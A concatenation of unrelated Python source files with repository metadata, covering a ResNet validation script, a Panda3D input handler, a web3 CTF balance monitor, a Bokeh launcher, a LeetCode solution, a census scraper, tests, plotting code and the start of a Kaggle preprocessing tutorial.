599b2f6f2bda0dc8ed7f1276ca0b9a3c34c3d5df | 200a7e17f51f7a2b959e6b0313b76effd9edb2ea | /image_classification/valid_resnet152.py | 2f26314780c2291382dd4996d630e4bf1bb0bec8 | [
"Apache-2.0",
"MIT"
] | permissive | ZhiangChen/tornado_ML | 43f243c0e8371830a104afa5b177deebfc14440d | d8bded61a6a234ca67e31776bc8576c6c18f5621 | refs/heads/main | 2023-04-29T04:40:05.850645 | 2021-05-20T04:50:32 | 2021-05-20T04:50:32 | 358,980,904 | 1 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,370 | py | """
training.py
Zhiang Chen, April 2020
"""
import torch
import torch.utils.data
import torchvision.datasets
import torch.nn as nn
import torchvision.transforms as transforms
from utils import *
import torchvision.models as models
from data import EurekaDataset
import os
model_names = sorted(name for name in models.__dict__
if name.islower() and not name.startswith("__")
and callable(models.__dict__[name]))
torch.manual_seed(0)
normalize = transforms.Normalize(mean=[0.485, 0.456, 0.406],
std=[0.229, 0.224, 0.225])
eureka_normalize = transforms.Normalize(mean=[0.44, 0.50, 0.43],
std=[0.26, 0.25, 0.26])
eureka_transform = transforms.Compose([
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
eureka_normalize,])
train_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.RandomHorizontalFlip(),
transforms.ToTensor(),
normalize,])
test_transform = transforms.Compose([
transforms.RandomResizedCrop(224),
transforms.ToTensor(),
normalize,])
def neural_network(architecture, nm_classes, pretrained=True, change_last_layer=True):
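    # Descriptive note: builds a torchvision model by name; when change_last_layer is
    # True, the final classifier/fc layer is replaced with a fresh Linear layer sized
    # for nm_classes outputs.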
assert architecture in model_names
print("=> creating model '{}'".format(architecture))
model = models.__dict__[architecture](pretrained=pretrained)
if change_last_layer:
if architecture.startswith('densenet'):
in_features = model.classifier.in_features
model.classifier = nn.Linear(in_features=in_features, out_features=nm_classes)
else:
in_features = model.fc.in_features
model.fc = nn.Linear(in_features=in_features, out_features=nm_classes)
return model
def cifar10(root='./datasets/cifar10/', val=True):
train = torchvision.datasets.CIFAR10(root, train=True, download=True, transform=train_transform)
test = torchvision.datasets.CIFAR10(root, train=False, download=True, transform=test_transform)
"""
if val:
indices = torch.randperm(len(train)).tolist()
train_set = torch.utils.data.Subset(train, indices[:-10000])
val_set = torch.utils.data.Subset(train, indices[-10000:])
return train_set, val_set, test
"""
return train, test
def eureka():
train = EurekaDataset('./datasets/Eureka/images/','./datasets/Eureka/class.json', eureka_transform)
test = EurekaDataset('./datasets/Eureka/images_test/','./datasets/Eureka/class.json', eureka_transform)
test.addJson('./datasets/Eureka/label_102.json')
return train, test
if __name__ == '__main__':
cuda = 'cuda:0'
device = torch.device(cuda)
nm_classes = 3
train_dataset, test_dataset = eureka()
train_dataloader = torch.utils.data.DataLoader(
train_dataset, batch_size=4, shuffle=True, num_workers=8, collate_fn=collate_fn)
test_dataloader = torch.utils.data.DataLoader(
test_dataset, batch_size=4, shuffle=True, num_workers=8, collate_fn=collate_fn)
model = neural_network('resnet152', nm_classes)
#if you want to load weight
#model.load_state_dict(torch.load("trained_param_eureka_cls/epoch_0002.param"))
#model.eval()
model.to(device)
criterion = nn.CrossEntropyLoss().to(device)
params = [p for p in model.parameters() if p.requires_grad]
optimizer = torch.optim.SGD(params, lr=0.001, momentum=0.9, weight_decay=0.00001)
lr_scheduler = torch.optim.lr_scheduler.StepLR(optimizer, step_size=5, gamma=0.65)
#init_epoch = 0
#num_epochs = 60
#print_freq = 100
#save_param = "trained_param3_resnext101/epoch_{:04d}.param".format(init_epoch)
#torch.save(model.state_dict(), save_param)
weight_path = "trained_param_resnet152"
weights = [f for f in os.listdir(weight_path) if f.endswith(".param")]
weights.sort()
for w in weights:
weight_name = os.path.join(weight_path, w)
#save_param = "trained_param3_resnext101/epoch_{:04d}.param".format(epoch)
#train(train_dataloader, model, criterion, optimizer, epoch, device, print_freq)
#lr_scheduler.step()
print(weight_name)
model.load_state_dict(torch.load(weight_name))
validate(test_dataloader, model, criterion, device)
#acc = test(model, test_dataset, device)
#print("acc: %f" % acc)
#torch.save(model.state_dict(), save_param)
| [
"[email protected]"
] | |
71f6171f7aaed83d059577c3d31fc17bf81f12e2 | 2a4a17a67b9069c19396c0f8eabc8b7c4b6ff703 | /BGP3D/Chapter10/Examples/InputManagerClass_01.py | 692c2663e7045b2d047b6e25f1ff8cc495719df4 | [] | no_license | kaz101/panda-book | 0fa273cc2df5849507ecc949b4dde626241ffa5e | 859a759c769d9c2db0d11140b0d04506611c2b7b | refs/heads/master | 2022-12-19T09:36:05.794731 | 2020-09-16T19:04:10 | 2020-09-16T19:04:10 | 295,784,057 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 4,187 | py | ''' InputManager Class
The purpose of this class is to have an object
that will record user input and retain that
information for use by other classes.
'''
from direct.showbase.DirectObject import DirectObject
from pandac.PandaModules import *
class InputManager(DirectObject):
def __init__(self):
self.keyMap = {"up" : False,
"down" : False,
"left" : False,
"right" : False,
"fire" : False,
"mouse1" : False,
"mouse3" : False}
# Creates a key map to store the state of relevant keyboard keys.
self.accept("w", self.setKey, ["up", True])
self.accept("s", self.setKey, ["down", True])
self.accept("a", self.setKey, ["left", True])
self.accept("d", self.setKey, ["right", True])
self.accept("enter", self.setKey, ["fire", True])
self.accept("mouse1", self.setKey, ["mouse1", True])
self.accept("mouse3", self.setKey, ["mouse3", True])
# Registers the events for key and mouse presses and
# connects them to the setKey method.
self.accept("w-up", self.setKey, ["up", False])
self.accept("s-up", self.setKey, ["down", False])
self.accept("a-up", self.setKey, ["left", False])
self.accept("d-up", self.setKey, ["right", False])
self.accept("enter-up", self.setKey, ["fire", False])
self.accept("mouse1-up", self.setKey, ["mouse1", False])
self.accept("mouse3-up", self.setKey, ["mouse3", False])
# Registers the events for key and mouse releases and
# connects them to the setKey method.
self.setupMouseAim()
# creates the collision objects used for aiming with the mouse.
def setKey(self, key, value):
self.keyMap[key] = value
return
# setKey: stores the given value in the given key within the key map dictionary.
def setupMouseAim(self):
self.CN = CollisionNode("RayCN")
self.cRay = CollisionRay()
self.CN.addSolid(self.cRay)
self.CN.setFromCollideMask(BitMask32.bit(8))
self.CN.setIntoCollideMask(BitMask32.allOff())
self.CN = base.camera.attachNewNode(self.CN)
        # This creates a new collision ray and puts it into a collision node.
        # Its bitmask is set to 8, and it will be the only collider at bit 8.
self.aimPlaneCN = CollisionNode("aimPlaneCN")
self.aimPlane = CollisionPlane(Plane(Vec3(0,-1,0),
Point3(0,30,0)))
self.aimPlaneCN.addSolid(self.aimPlane)
self.aimPlaneCN.setFromCollideMask(BitMask32.allOff())
self.aimPlaneCN.setIntoCollideMask(BitMask32.bit(8))
self.aimPlaneCNP = base.camera.attachNewNode(self.aimPlaneCN)
        # This creates a collision plane and puts it into a collision node.
        # Its bitmask is set to 8, and it will be the only collidable object at bit 8.
        # The collision node is attached to the camera so that it will move with the camera.
self.cTrav = CollisionTraverser()
# Creates a traverser to do collision testing
self.cHanQ = CollisionHandlerQueue()
# Creates a queue type handler to receive the collision event info.
self.cTrav.addCollider(self.CN, self.cHanQ)
# register the ray as a collider with the traverser,
# and register the handler queue as the handler to be used for the collisions.
def getMouseAim(self):
        # This function checks the aim plane for a collision with the mouse ray. It also makes
        # sure that the ray is positioned correctly and aimed at the mouse pointer.
if base.mouseWatcherNode.hasMouse():
#We must check to make sure the window has the mouse to prevent a crash error caused by accessing the mouse
#when it's not in the window.
mpos = base.mouseWatcherNode.getMouse()
#get the mouse position in the window
self.cRay.setFromLens(
base.camNode, mpos.getX(), mpos.getY())
#sets the ray's origin at the camera and directs it to shoot through the mouse cursor
self.cTrav.traverse(self.aimPlaneCNP)
#performs the collision checking pass
self.cHanQ.sortEntries()
# Sort the handler entries from nearest to farthest
if(self.cHanQ.getNumEntries() > 0):
entry = self.cHanQ.getEntry(0)
colPoint = entry.getSurfacePoint(render)
return(colPoint) | [
"[email protected]"
] | |
c6a4ab92e7015536946f440f0ffb7bc101b5570f | 214230d0796377be0bfdda286c2c389b92a19555 | /Codegate/2022 Quals/nft/monitor.py | 4922b3db2a6b542e3d5b30e586133eea5016c4fd | [
"Unlicense"
] | permissive | Qwaz/solved-hacking-problem | fa5ebfeb98ec979cf57dac1470a651199f2dc50d | cda0db4888322cce759a7362de88fff5cc79f599 | refs/heads/master | 2023-08-24T03:45:12.481496 | 2023-07-16T12:38:08 | 2023-07-16T12:38:08 | 49,208,719 | 100 | 28 | null | 2022-03-24T00:51:04 | 2016-01-07T14:18:18 | HTML | UTF-8 | Python | false | false | 604 | py | import json
import time
from account import *
from web3 import Web3
url = "http://13.124.97.208:8545"
provider = Web3(Web3.HTTPProvider(url))
with open("abi.json") as f:
nft_abi = json.load(f)
nft = provider.eth.contract(TARGET_ADDRESS, abi=nft_abi)
while True:
print(
{
"Balance": provider.eth.getBalance(SENDER_ADDRESS),
"Block number": provider.eth.block_number,
"My transactions": provider.eth.get_transaction_count(SENDER_ADDRESS),
"NFTs": nft.functions.getIDs().call({"from": SENDER_ADDRESS}),
}
)
time.sleep(3)
| [
"[email protected]"
] | |
dceb561fd9b18dfb85b1c5185bbee23385340b30 | cd9e707df25dd641163c0f89f33bdbcaa4f11a0c | /app/launcher.py | 35b960fefa33b4f16d990cbfd903bb0ea5170691 | [] | no_license | depixusgenome/libanalysis | 80e50953d4fad1654091bbaf59f181803671a242 | 3565db8c0e42d62c1adee1d664846227499f1302 | refs/heads/master | 2020-09-24T08:40:10.498554 | 2019-11-29T13:03:31 | 2019-11-29T13:03:31 | 225,716,577 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 7,795 | py | #!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Updates app manager so as to deal with controllers"
from contextlib import closing
from typing import Dict, Any
import sys
import asyncio
import socket
import random
from tornado.platform.asyncio import AsyncIOMainLoop
from bokeh.application import Application
from bokeh.application.handlers import FunctionHandler
from bokeh.server.server import Server
from bokeh.settings import settings
from bokeh.resources import DEFAULT_SERVER_PORT
from utils.logconfig import getLogger
from .scripting import orders
from .maincontrol import createview as _creator
LOGS = getLogger(__name__)
CAN_LOAD_JS = "."
class _FunctionHandler(FunctionHandler):
def __init__(self, view, stop = False):
self.__gotone = False
self.server = None
self.stoponnosession = stop
self.view = view
super().__init__(self.__start)
def on_session_created(self, session_context):
LOGS.debug('started session')
def on_session_destroyed(self, session_context):
LOGS.debug('destroyed session')
if not self.__gotone:
return
if self.server is not None and self.stoponnosession:
server, self.server = self.server, None
if len(server.get_sessions()) == 0:
LOGS.info('no more sessions -> stopping server')
server.stop()
@classmethod
def serveapplication(cls, view, **kwa):
"Launches a bokeh server"
# monkeypatch the js production: it's been done once & saved during compilation
cls.__monkeypatch_bokeh()
cls.__setport(kwa)
cls.__server_kwargs(kwa)
fcn = cls(view)
server = Server(Application(fcn), **kwa)
fcn.server = server
server.MainView = view
server.appfunction = fcn
return server
@classmethod
def launchflexx(cls, view, **kwa):
"Launches a bokeh server"
from webruntime import launch as _flexxlaunch
port = cls.__setport(kwa)
if isinstance(kwa.get('size', ()), list):
kwa['size'] = tuple(kwa['size'])
if isinstance(view, Server):
server = view
else:
server = cls.serveapplication(view, **kwa.pop('server', {}), port = port)
if kwa.get('runtime', 'app').endswith('app'):
cls.__monkeypatch_flexx(server)
view.MainControl.FLEXXAPP = _flexxlaunch('http://localhost:{}/'.format(port),
**kwa)
elif kwa.get('runtime', '') != 'none':
server.io_loop.add_callback(lambda: server.show("/"))
return server
@staticmethod
def __monkeypatch_flexx(server):
from webruntime._common import StreamReader
def run(self, __old__ = StreamReader.run):
"Stop the stream reader"
__old__(self)
server.stop()
StreamReader.run = run
@staticmethod
def __monkeypatch_bokeh():
# pylint: disable=import-outside-toplevel
from bokeh.core.properties import Seq
def from_json(self, json, models=None, __old__ = Seq.from_json):
"parse docstring"
if isinstance(json, dict):
json = {int(i): j for i, j in json.items()}
keys = sorted(json)
assert keys == list(range(max(json)+1))
json = [json[i] for i in keys]
return __old__(self, json, models = models)
Seq.from_json = from_json
def _stop(self, wait=True, __old__ = Server.stop):
if not getattr(self, '_stopped', False):
__old__(self, wait)
self.io_loop.stop()
Server.stop = _stop
@staticmethod
def __server_kwargs(kwa)-> Dict[str, Any]:
kwa.setdefault('sign_sessions', settings.sign_sessions())
kwa.setdefault('secret_key', settings.secret_key_bytes())
kwa.setdefault('generate_session_ids', True)
kwa.setdefault('use_index', True)
kwa.setdefault('redirect_root', True)
kwa.pop('runtime', None)
if isinstance(kwa.get('size', ()), list):
kwa['size'] = tuple(kwa['size'])
LOGS.debug("dynamic loads: %s", orders().dynloads())
LOGS.info(' http://localhost:%s', kwa['port'])
for mdl in orders().dynloads():
getattr(sys.modules.get(mdl, None), 'server', lambda x: None)(kwa)
return kwa
@staticmethod
def __setport(kwa):
if kwa.get('port', None) == 'random':
while True:
with closing(socket.socket(socket.AF_INET, socket.SOCK_STREAM)) as sock:
sock.settimeout(2)
kwa['port'] = random.randint(2000, 8000)
if sock.connect_ex(("127.0.0.1", kwa['port'])) != 0:
break
else:
kwa['port'] = int(kwa.get('port', DEFAULT_SERVER_PORT))
return kwa['port']
def __onloaded(self):
if self.__gotone is False:
self.__gotone = True
LOGS.debug("GUI loaded")
def __start(self, doc):
doc.title = self.view.launchkwargs()['title']
orders().run(self.view, doc, self.__onloaded)
def setup(locs, #
creator = _creator,
defaultcontrols = tuple(),
defaultviews = tuple(),
):
"""
Populates a module with launch and serve functions for a given app context.
The context is created as follows, say in module `app.mycontext`:
```python
#!/usr/bin/env python3
# -*- coding: utf-8 -*-
"Updates app manager so as to deal with controllers"
from .launcher import setup
VIEWS = ('undo.UndoView', 'view.tasksview.TasksView',)
CONTROLS = ('control.taskcontrol.TaskController',
'taskstore.control',
'undo.UndoController')
setup(locals(), defaultcontrols = CONTROLS, defaultviews = VIEWS)
```
To launch a `webruntime` window displayng `myview.MyView`:
```python
from app.mycontext import launch
launch("myview.MyView")
```
See `app.toolbar` for an example which sets-up a toolbar above any view provided
as a argument.
"""
def _install():
asyncio.set_event_loop(asyncio.new_event_loop())
AsyncIOMainLoop().make_current()
def application(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews):
"Creates a main view"
return creator(main, controls, views)
def serve(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews,
apponly = False,
**kwa):
"Creates a browser app"
_install()
app = application(main, creator, controls, views)
if apponly:
return app
return _FunctionHandler.serveapplication(app, **kwa)
def launch(main,
creator = creator,
controls = defaultcontrols,
views = defaultviews,
apponly = False,
**kwa):
"Creates a desktop app"
_install()
app = application(main, creator, controls, views)
if apponly:
return app
return _FunctionHandler.launchflexx(app, **app.launchkwargs(**kwa))
locs.setdefault('application', application)
locs.setdefault('serve', serve)
locs.setdefault('launch', launch)
| [
"[email protected]"
] | |
150f246e7cffd52c4816f26c2ce92dcb16d63e69 | bfe6c95fa8a2aae3c3998bd59555583fed72900a | /trapRainWater.py | 90bf3bb91de30cedf3d4da4078594bb04fe33a9b | [] | no_license | zzz136454872/leetcode | f9534016388a1ba010599f4771c08a55748694b2 | b5ea6c21bff317884bdb3d7e873aa159b8c30215 | refs/heads/master | 2023-09-01T17:26:57.624117 | 2023-08-29T03:18:56 | 2023-08-29T03:18:56 | 240,464,565 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 3,026 | py | from heapq import heappop, heappush
from typing import List
class Solution:
def trapRainWater(self, heightMap: List[List[int]]) -> int:
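        # Min-heap flood fill (descriptive note): seed the heap with the boundary
        # cells (which hold no water), repeatedly pop the cell with the lowest water
        # level (height + trapped water), and cap the water its four neighbours can
        # hold at that level; the answer is the total trapped water over all cells.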
m = len(heightMap)
n = len(heightMap[0])
heap = []
water = [[12345678] * n for i in range(m)]
for i in range(m):
heappush(heap, (heightMap[i][0], i, 0))
heappush(heap, (heightMap[i][n - 1], i, n - 1))
water[i][0] = 0
water[i][n - 1] = 0
for j in range(1, n - 1):
heappush(heap, (heightMap[0][j], 0, j))
heappush(heap, (heightMap[m - 1][j], m - 1, j))
water[0][j] = 0
water[m - 1][j] = 0
while len(heap) > 0:
now = heappop(heap)
nh = now[0]
if now[1] > 0:
if water[now[1] - 1][now[2]] + heightMap[now[1] - 1][
now[2]] > nh and water[now[1] - 1][now[2]] > 0:
water[now[1] - 1][now[2]] = max(
0, nh - heightMap[now[1] - 1][now[2]])
heappush(
heap,
(water[now[1] - 1][now[2]] +
heightMap[now[1] - 1][now[2]], now[1] - 1, now[2]))
if now[1] < m - 1:
if water[now[1] + 1][now[2]] + heightMap[now[1] + 1][
now[2]] > nh and water[now[1] + 1][now[2]] > 0:
water[now[1] + 1][now[2]] = max(
0, nh - heightMap[now[1] + 1][now[2]])
heappush(
heap,
(water[now[1] + 1][now[2]] +
heightMap[now[1] + 1][now[2]], now[1] + 1, now[2]))
if now[2] > 0:
if water[now[1]][now[2] - 1] + heightMap[now[1]][
now[2] - 1] > nh and water[now[1]][now[2] - 1] > 0:
water[now[1]][now[2] - 1] = max(
0, nh - heightMap[now[1]][now[2] - 1])
heappush(
heap,
(water[now[1]][now[2] - 1] +
heightMap[now[1]][now[2] - 1], now[1], now[2] - 1))
if now[2] < n - 1:
if water[now[1]][now[2] + 1] + heightMap[now[1]][
now[2] + 1] > nh and water[now[1]][now[2] + 1] > 0:
water[now[1]][now[2] + 1] = max(
0, nh - heightMap[now[1]][now[2] + 1])
heappush(
heap,
(water[now[1]][now[2] + 1] +
heightMap[now[1]][now[2] + 1], now[1], now[2] + 1))
return sum(sum(w) for w in water)
heightMap = [[1, 4, 3, 1, 3, 2], [3, 2, 1, 3, 2, 4], [2, 3, 3, 2, 3, 1]]
heightMap = [[3, 3, 3, 3, 3], [3, 2, 2, 2, 3], [3, 2, 1, 2, 3],
[3, 2, 2, 2, 3], [3, 3, 3, 3, 3]]
# heightMap=[[12,13,1,12],[13,4,13,12],[13,8,10,12],[12,13,12,12],[13,13,13,13]]
print(Solution().trapRainWater(heightMap))
| [
"[email protected]"
] | |
9c767873c7d94a6b7c04e62f428978616df72b28 | 3d19e1a316de4d6d96471c64332fff7acfaf1308 | /Users/P/pinakighosh/state18.py | 8edcffd229b35ac73c3e1e4c249b99569bd7806f | [] | no_license | BerilBBJ/scraperwiki-scraper-vault | 4e98837ac3b1cc3a3edb01b8954ed00f341c8fcc | 65ea6a943cc348a9caf3782b900b36446f7e137d | refs/heads/master | 2021-12-02T23:55:58.481210 | 2013-09-30T17:02:59 | 2013-09-30T17:02:59 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 6,650 | py | import scraperwiki
import mechanize # added by Usha
import re # added by Usha
import lxml.html
url="http://censusindia.gov.in/Census_Data_2001/Village_Directory/List_of_Villages/List_of_Villages_Alphabetical.aspx?cki=&State_Code=18"
import string
#create list of upper case alphabets
l=list(string.ascii_uppercase)
#create list 1-35
l1=list(range(1,36))
l2=[]
s_no=0
#convert numbers in l2 to string
for i in l1:
l2.append(str(i))
#append a 0 for single digit numbers
for i in range(10):
l2[i]='0'+l2[i]
state_count=0
c=1
data=[]
#run loop for all state and union territories
#while state_count<35:
while state_count<1:
#add state code to the url
#url1=url+l2[state_count]+"&SearchKey="
url1=url+"&SearchKey="
state_count+=1
count=0
l_c=0
#data=[]
row=[]
#run loop for alphabets
while count<26:
#while count<2:
#add search alphabet to the url
url2=url1+l[count]
# code added by Usha Nair
br = mechanize.Browser()
br.addheaders = [('User-agent', 'Mozilla/5.0 (X11; U; Linux i686; en-US; rv:1.9.0.1) Gecko/2008071615 Fedora/3.0.1-1.fc9 Firefox/3.0.1')]
response = br.open(url2)
VAR1 = response.read() #reads the source file for the web page
br.select_form(nr=0)
br.set_all_readonly(False)
mnext = re.search("""<a id="lnkShowAll" href="javascript:__doPostBack\('(.*?)','(.*?)'\)" style="font-family:Verdana;font-size:Smaller;">Show All""", VAR1)
if not mnext:
break
br["__EVENTTARGET"] = mnext.group(1)
br["__EVENTARGUMENT"] = mnext.group(2)
#br.find_control("btnSearch").disabled = True
response = br.submit()
VAR2 = response.read() # source code after submitting show all
print "response"
print response
print "VAR2"
print VAR2
# Usha Nair till here
#html = scraperwiki.scrape(url2)
#root = lxml.html.fromstring(html)
root = lxml.html.fromstring(VAR2)
count+=1
#select div where data exists
for el in root.cssselect("div#printarea td"):
#select appropriate table row
for el2 in el.cssselect("tr.GridAlternativeRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
#select appropriate table row
for el2 in el.cssselect("tr.GridRows td"):
if l_c<4:
row.append(el2.text_content())
l_c+=1
else:
row.append(el2.text_content())
l_c=0
data.append(row)
#save to data base
scraperwiki.sqlite.save(unique_keys=["sl_no"],
data={"sl_no":s_no,"village_name":row[1],
"village_code":row[2],"Sub_district_Name":row[3],"District_Name":row[4]})
s_no+=1
row=[]
print "completed scrapping"
| [
"[email protected]"
] | |
20786461b76ff1f1326b20fb8848a9ae5e46f159 | 007e187c7d91702fc900b75f771a2470e1c091e1 | /tests/test_docker.py | 28b67c058bb792d1b640d3f6bcd6e4c2eb60caf8 | [] | no_license | bibi21000/janitoo_raspberry_i2c_ht16k33 | bb3d05bdb395a29862c4e6bbb57c5e369aaca1e8 | 3dbb883cdc3439fd164edff21ffc0a0da7ee160f | refs/heads/master | 2021-01-21T04:42:30.553870 | 2018-01-01T23:43:29 | 2018-01-01T23:43:29 | 55,532,142 | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 1,899 | py | # -*- coding: utf-8 -*-
"""Unittests for Janitoo-common.
"""
__license__ = """
This file is part of Janitoo.
Janitoo is free software: you can redistribute it and/or modify
it under the terms of the GNU General Public License as published by
the Free Software Foundation, either version 3 of the License, or
(at your option) any later version.
Janitoo is distributed in the hope that it will be useful,
but WITHOUT ANY WARRANTY; without even the implied warranty of
MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
GNU General Public License for more details.
You should have received a copy of the GNU General Public License
along with Janitoo. If not, see <http://www.gnu.org/licenses/>.
"""
__author__ = 'Sébastien GALLET aka bibi21000'
__email__ = '[email protected]'
__copyright__ = "Copyright © 2013-2014-2015-2016 Sébastien GALLET aka bibi21000"
import warnings
warnings.filterwarnings("ignore")
import sys, os
import time
import unittest
import logging
import threading
import mock
import logging
from janitoo_nosetests import JNTTBase
from janitoo_nosetests.server import JNTTDockerServerCommon, JNTTDockerServer
from janitoo.runner import Runner, jnt_parse_args
from janitoo.server import JNTServer
from janitoo.utils import HADD_SEP, HADD
from janitoo_raspberry.server import PiServer
class TestRaspberryHT16K33Serser(JNTTDockerServer, JNTTDockerServerCommon):
"""Test the server
"""
loglevel = logging.DEBUG
path = '/tmp/janitoo_test'
broker_user = 'toto'
broker_password = 'toto'
server_class = PiServer
server_conf = "tests/data/janitoo_raspberry_i2c_ht16k33.conf"
hadds = [HADD%(144,0), HADD%(144,1)]
def test_040_server_start_no_error_in_log(self):
JNTTDockerServer.onlyDockerTest()
JNTTDockerServerCommon.minimal_040_server_start_reload_restart(self)
| [
"[email protected]"
] | |
ea84847a897152e526e739c1b328a0e72c02ca0e | 7fdac5209f86de756b9a8123a0911b70738eceeb | /pySDC/playgrounds/other/plots_overresolve_iter.py | 74944e603d1cf9c88e95f665c70286392dffcc72 | [
"BSD-2-Clause"
] | permissive | Parallel-in-Time/pySDC | edc66e399f6066effc5aaa376883e88e06b5332b | 1a51834bedffd4472e344bed28f4d766614b1537 | refs/heads/master | 2023-08-30T23:17:56.017934 | 2023-08-30T05:42:00 | 2023-08-30T05:42:00 | 26,165,004 | 30 | 31 | BSD-2-Clause | 2023-09-14T06:40:13 | 2014-11-04T10:56:53 | Jupyter Notebook | UTF-8 | Python | false | false | 2,099 | py | import pySDC.helpers.plot_helper as plt_helper
def beautify_plot(nprocs, fname):
plt_helper.plt.grid()
plt_helper.plt.legend(loc=2)
plt_helper.plt.xlabel('Number of parallel steps')
plt_helper.plt.ylabel('Theoretical speedup')
plt_helper.plt.xlim(0.9 * nprocs[0], 1.1 * nprocs[-1])
plt_helper.plt.ylim(0.25, 6.5)
plt_helper.plt.xticks(nprocs, nprocs)
plt_helper.plt.minorticks_off()
# save plot, beautify
plt_helper.savefig(fname)
def plot_data():
nprocs = [1, 2, 4, 8]
niter_overres = [9, 5, 11, 23]
alpha_overres = 1.0 / 4.0
speedup_overres = [
p / (p / niter_overres[0] * alpha_overres + k / niter_overres[0] * (1 + alpha_overres))
for p, k in zip(nprocs, niter_overres)
]
plt_helper.setup_mpl()
plt_helper.newfig(textwidth=238.96, scale=1.0)
plt_helper.plt.semilogx(
nprocs,
speedup_overres,
color='orange',
marker='o',
markersize=6,
label=r'$Nx_\mathcal{F}=512, \alpha=\frac{1}{4}$',
)
beautify_plot(nprocs, 'fool_speedup_overres_iter')
niter_wellres_1 = [9, 11, 16, 28]
alpha_wellres_1 = 1.0 / 4.0
speedup_wellres_1 = [
p / (p / niter_wellres_1[0] * alpha_wellres_1 + k / niter_wellres_1[0] * (1 + alpha_wellres_1))
for p, k in zip(nprocs, niter_wellres_1)
]
niter_wellres_2 = [9, 11, 16, 29]
alpha_wellres_2 = 1.0 / 2.0
speedup_wellres_2 = [
p / (p / niter_wellres_2[0] * alpha_wellres_2 + k / niter_wellres_2[0] * (1 + alpha_wellres_2))
for p, k in zip(nprocs, niter_wellres_2)
]
plt_helper.setup_mpl()
plt_helper.newfig(textwidth=238.96, scale=1.0)
plt_helper.plt.semilogx(
nprocs, speedup_wellres_1, color='r', marker='d', markersize=6, label=r'$Nx_\mathcal{F}=32, \alpha=\frac{1}{4}$'
)
plt_helper.plt.semilogx(
nprocs, speedup_wellres_2, color='b', marker='s', markersize=6, label=r'$Nx_\mathcal{F}=32, \alpha=\frac{1}{2}$'
)
beautify_plot(nprocs, 'fool_speedup_wellres_iter')
if __name__ == '__main__':
plot_data()
| [
"[email protected]"
] | |
76359312a5bbde79e5804a8ff7620d844d4189e4 | ebacefb163f31b3dd43f15ebdc91c5b76f6b703b | /lib/github/tasks.py | c6dd31a374dbbdae389ee01476928217efdc4fde | [
"MIT"
] | permissive | xyzlat/django-htk | a0180d3104c7e716cb07e075408acc14702abbc2 | 051256698ce7a593a8a9365c36ad9d265c6e0d80 | refs/heads/master | 2023-04-29T18:48:23.205203 | 2021-05-22T04:15:13 | 2021-05-22T04:15:13 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 2,373 | py | # HTK Imports
from htk.constants.time import (
BUSINESS_HOURS_START,
ISOWEEKDAY_WEEKDAYS,
MORNING_HOURS_END,
)
from htk.tasks import BaseTask
from htk.utils.text.transformers import get_symbols
# isort: off
class GitHubReminderTask(BaseTask):
def __init__(self):
from htk.lib.github.cachekeys import GitHubReminderCooldown
super(GitHubReminderTask, self).__init__(cooldown_class=GitHubReminderCooldown)
def has_cooldown(self, user):
_has_cooldown = super(GitHubReminderTask, self).has_cooldown(user)
#_has_cooldown = False
return _has_cooldown
def get_users(self):
import htk.apps.accounts.filters as _filters
from htk.apps.accounts.utils.lookup import get_users_with_attribute_value
users = get_users_with_attribute_value('github_reminders', True, as_bool=True)
users = _filters.users_currently_at_local_time(users, BUSINESS_HOURS_START, MORNING_HOURS_END, isoweekdays=ISOWEEKDAY_WEEKDAYS)
return users
def execute(self, user):
now = user.profile.get_local_time()
valid_chars = 'A-Za-z0-9_\-/'
github_organizations = get_symbols(
user.profile.get_attribute('github_organizations') or '',
valid_chars=valid_chars
)
github_repositories = get_symbols(
user.profile.get_attribute('github_repositories') or '',
valid_chars=valid_chars
)
self.send_github_reminders(
user,
organizations=github_organizations,
repositories=github_repositories
)
def send_github_reminders(self, user, organizations=None, repositories=None):
github_access_token = user.profile.get_attribute('github_access_token')
slack_webhook_url = user.profile.get_attribute('slack_webhook_url')
slack_channel = user.profile.get_attribute('github_reminders_slack_channel')
mention_here = user.profile.get_attribute('github_reminders_slack_mention_here')
from htk.lib.github.bots import GitHubReminderSlackBot
bot = GitHubReminderSlackBot(
slack_webhook_url,
slack_channel,
github_access_token,
organizations=organizations,
repositories=repositories,
mention_here=mention_here
)
bot.remind_pull_requests()
| [
"[email protected]"
] | |
df817cfce618305f6504307136b261cf76332d27 | 6d8915634102167d7515648e792a692a405dadc0 | /documentation/Tutorial_Modules/Machine_Learning_and_Feature_Extraction_Tutorial/Preprocessing_Tutorial/Kaggle_Preprocessing.py | e129f02cd48840985c5bbbcb06a3de5932425d5f | [
"Apache-2.0",
"LicenseRef-scancode-unknown-license-reference"
] | permissive | LiaoPan/qtim_tools | 6b2e43563c74ef9f6a29fd924d2d2bde0d97768a | 92bd15ec7a81c5eda70d11a015f74538f3c41e22 | refs/heads/master | 2020-04-02T05:31:56.851236 | 2018-09-24T16:10:50 | 2018-09-24T16:10:50 | null | 0 | 0 | null | null | null | null | UTF-8 | Python | false | false | 16,181 | py |
# coding: utf-8
# # Prerequisites
#
# Welcome to class!
#
# The following tutorial was written by Guido Zuidhoff, and can be seen as originally published at https://www.kaggle.com/gzuidhof/data-science-bowl-2017/full-preprocessing-tutorial/discussion. It is being rehosted at https://github.com/QTIM-Lab/qtim_tools/tree/master/documentation/iPython_Tutorials. It discusses some of the most common pre-processing steps one can take before feeding medical imaging data into a neural network or other deep learning algorithm.
#
# You can run the code yourself a few different ways:
#
# A) You can download this folder from Github, and then copy and paste the code segments below into your own python interpreter.
#
# B) You can SSH to our class server at 155.52.190.4, and run some of the code at the following path:
#
